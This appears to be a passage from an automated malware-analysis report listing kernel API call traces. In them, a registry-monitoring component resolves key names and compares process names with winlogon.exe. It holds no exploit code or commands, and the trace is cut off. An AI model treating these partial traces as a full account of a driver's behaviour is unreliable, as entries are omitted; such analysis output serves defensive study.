| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000005, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000005 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000005, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000005 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Execution Path #163 (length: 50, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 50 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf4, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78a39c0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0xf2, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs\27748148BBE67A43CDBFEC6C3784862CE134E6EA, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs\27748148BBE67A43CDBFEC6C3784862CE134E6EA |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78a39c0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf4, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78a39c0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0xf2, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs\27748148BBE67A43CDBFEC6C3784862CE134E6EA, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs\27748148BBE67A43CDBFEC6C3784862CE134E6EA |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78a39c0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf4, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78a39c0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b78a39c0, Length = 0xf2, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs\27748148BBE67A43CDBFEC6C3784862CE134E6EA, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs\27748148BBE67A43CDBFEC6C3784862CE134E6EA |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
Execution Path #164 (length: 12, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba098760, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba098760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba098760, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba098760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 |
| ObQueryNameString | Object_ptr = 0xffffc000ba098760, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\SystemCertificates\Root\ProtectedRoots, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\SystemCertificates\Root\ProtectedRoots |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\SystemCertificates\Root\ProtectedRoots, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -4 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
Execution Path #169 (length: 13, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
